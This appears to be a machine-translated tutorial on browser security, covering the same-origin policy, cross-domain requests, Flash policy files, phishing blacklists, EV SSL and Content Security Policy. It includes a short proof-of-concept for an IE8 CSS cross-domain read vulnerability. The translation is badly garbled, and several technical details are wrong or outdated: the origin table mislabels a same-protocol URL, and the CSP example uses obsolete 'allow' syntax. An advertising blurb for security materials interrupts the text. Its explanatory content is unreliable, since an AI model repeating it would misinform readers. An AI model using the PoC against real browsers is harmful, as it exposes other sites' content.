preface
In recent years, people find that the browser is the biggest entrance to the Internet, and the vast majority of users use the Internet tool is the browser. Therefore, if the browser has security functions, it will be very good to protect users to access the Internet.
1. Same-origin policy
1. What is same-origin policy
The Same Origin Policy is a convention, which is the core and most basic security function of the browser. If the Same Origin Policy is missing, the normal functions of the browser are affected. It can be said that the Construction of the Web is based on the Same Origin Policy, and the browser is only an implementation of the Same Origin Policy.
The browser’s same-origin policy restricts files or scripts from different sources from reading or setting certain properties on the current file.
If there is no same-origin policy, assuming that a.com has a javascript script, when b.com has not loaded the script, a.com can modify the page of b.com at will (in the browser display). In order not to clutter up the browser’s page behavior, browsers came up with the concept of “Origin,” where objects from different sources can’t interfere with each other.
For JS, the real columns that are considered to have the same origin and different sources are:
| url | The results of | why |
|---|---|---|
| Stroe.shen.com/dir2/index…. | homologous | |
| Stroe.shen.com/dir/inner/a… | homologous | |
| stroe.shen.com/test2.html | Different source | Different protocols |
| Stroe.shen.com: 81 / dir/inner/a… | Different source | Different ports |
| New.shen.com/dir/inner/a… | Different source | Different host |
The source factors include domain name, IP address, subdomain name, port, and protocol
【 a > all resources to obtain < a 】 1, a lot of 200 out of print e-books have not been bought 2, 30G security factory inside the video materials 3, 100 SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit
Note:
For the current page, it is not important to the field where the JS file is stored in the page, but what is important to the field where the JS page is loaded.
In simple terms, 1.com uses the following code:
<script src=http://2.com/2.js></script>
2.js is loaded on 2.com, but 2.js is running on a 1.com page, so for the currently open page (1.com). The source of js should be 1.com.
2. XMLHttpRequest Same-origin policy
The XMLHttpRequest object provides full access to the HTTP protocol, including the ability to make POST and HEAD requests as well as plain GET requests. XMLHttpRequest can return the response from the Web server synchronously or asynchronously, and can return the content as text or as a DOM document.
The principle of
In the browser
In the case of XMLHttpRequest, it can access the content from the same origin object. However, resources cannot be accessed across domains.
Later, the W3C committee developed XMLHttpRequest cross-domain access standard. The HTTP header returned by the target domain is required to authorize cross-domain access, since HTTP headers are generally uncontrollable for JS. The security foundation of this cross-domain solution is the trust that “JS cannot control HTTP headers”.
The Origin field indicates the source (protocol + domain name + port) from which the request is sent. Based on this value, the server decides whether to approve the request or not. Access-control-allow-origin The value is either the Origin field value at the time of the request, or an *, indicating that requests from any domain name are accepted.
3. Flash plug-in same-origin policy
For browsers, DOM, cookies, and XMLHttpRequest are restricted by the same-origin policy. Some third-party plug-ins of browsers can also have non-violet same-origin policies, such as Flash and Java applets.
The principle of
Flash determines whether to allow the current source Flash to access the target resource across domains based on the crossdomain. XML file provided by the target website.
For example, if the browser loads the Flash file at www.test.com and accesses www.test.com in any other domain, the Flash checks whether the policy file exists on www.test.com. If the file exists, check whether the domain of the originating request is within the permitted scope.
<? The XML version = "1.0"? > <cross-domain-policy> <allow-access-from domain="*.test.com" /> <allow-access-from domain="*.test.net" /> <allow-access-from domain="*.test2.com" /> <allow-access-from domain="*.test.cn" /> <allow-access-from domain="*.test1.com" /> </cross-domain-policy>Copy the codeIn the policy file above, only fields within the allow-access-from tag are allowed.
Flash9 and later versions also check whether crossdomain.xml is valid through MINE, such as checking whether the content-Type of HTTP header returned by the server is test/*, application/ XML, etc. An attacker can upload the crossDomain.xml file to control Flash’s behavior, bypassing the same-origin policy. In addition to MIME checks, Flash will also check whether crossDomain.xml is in the root directory, disabling some upload attacks.
4, IE8 CSS cross-domain vulnerability test
The same origin policy of the browser may also have problems, we can bypass and so on, below we test IE8 CSS cross-domain vulnerability
A Server Deployment
http://192.168.163.131/a.html
<body>
{}body{font-family:
yyyyyyyyyyyyyyy
bbbbbbbbbbbbbbb
</body>
Copy the codeB Server Deployment
http://192.168.163.132/b.html
The < style > @ import url (" http://192.168.163.131/a.html "); </style> <script> setTimeout(function(){ var a = document.body.currentStyle.fontFamily; alert(a); }, 2000); </script>Copy the codeUsing Internet explorer and the following version of the browser to http://192.168.163.132/b.html, the test
We see pop-up a.h the contents of the HTML, theory var x = document. Body. CurrentStyle. FontFamily; Font-family: ‘x’, ‘body’, ‘color: RGB (0, 0, 0); font-size: 14px! Important;”
As mentioned earlier, equal tag can only load resources, but cannot read and write the content of resources. However, this vulnerability can realize cross-domain reading of page content. How it’s used is a matter of opinion.
Two, malicious website interception
1, the principle of malicious website interception
A malicious code is inserted into a web page to exploit vulnerabilities in the browser to execute arbitrary code attacks, known as “horse hanging.”
A mount attack can compromise browser security. In many cases, a mount attack will pass through a normal web page
Horse sites: Usually contain malicious scripts such as JS or Flash that exploit browser vulnerabilities to execute shellcode.
Phishing sites: sites that mimic similar pages from well-known sites to trick users.
The browser periodically obtains a new blacklist of malicious websites from the server. If a user accesses a website in the blacklist, the browser displays an alarm page.
PhishTank is one of the groups on the Internet that provides a free blacklist of malicious websites.
https://phishtank.org/index.php
2. Brief introduction of EVSSL Certificate
EV SSL, also known as EV SSL Certificate, or Extended Validation SSL Certificate, is a new SSL Certificate stringent authentication standard jointly developed by the world’s leading digital Certificate authorities and mainstream browser developers.
Enhanced SSL Certificates (EVSSL) are the highest level of SSL digital certificates. EVSSL’s main feature is to activate the web browser’s field to turn it green, using a bright logo to tell users that the site is being protected by the most stringent information security
At the same time, the EVSSL certificate complies with the X509 standard and is forward compatible with common certificates. If the browser does not support EV mode, the certificate is regarded as a common certificate. If the browser has hemorrhoids, it will be marked in the address bar.
EV certificate in Internet Explorer:
EV certificate does not exist in Internet Explorer:
We can combat phishing sites with green displays.
Content Security Policy (CSP)
1. Content Security Policy (CSP) principle
As web risks grew to mitigate cross-scripting attacks, browsers introduced the concept of content security policies (CSP),
In simple terms: the developer explicitly tells the client (specifying strict policies and rules) which external resources can be loaded and executed, and even if an attacker finds the vulnerability, he cannot inject the script.
Developers can use this tool to lock down their applications in a variety of ways, reduce the risk of content injection vulnerabilities, such as cross-site scripting, and reduce their application execution permissions
2. How to enable CSP
Content-security-policy fields via HTTP headers
Content-Security-Policy: policy
Policy describes machine flexibility.
Example 1:
Content-Security-Policy: allow 'self' *.qq.com
The browser trusts content from QQ.com and its subdomains.
Example 2:
Content-Security-Policy:
allow 'self';
img-src *;
media-src qq.com; script-src test.com
Copy the codeThe browser can load images from any domain, media files from QQ.com, scripts from Test.com, and refuse anything else in addition to trusting its own source.
Four,
The browser is an important entrance to the Internet. In the endless emergence of Web security events, the security of the browser is the top priority. Browser security is based on the same origin policy, and only by understanding the same origin policy can we grasp the essence of browser security. In this chapter, we introduce the principle of the same Origin policy and content security policy (CSP) in detail, and analyze the principle of browser blocking malicious websites.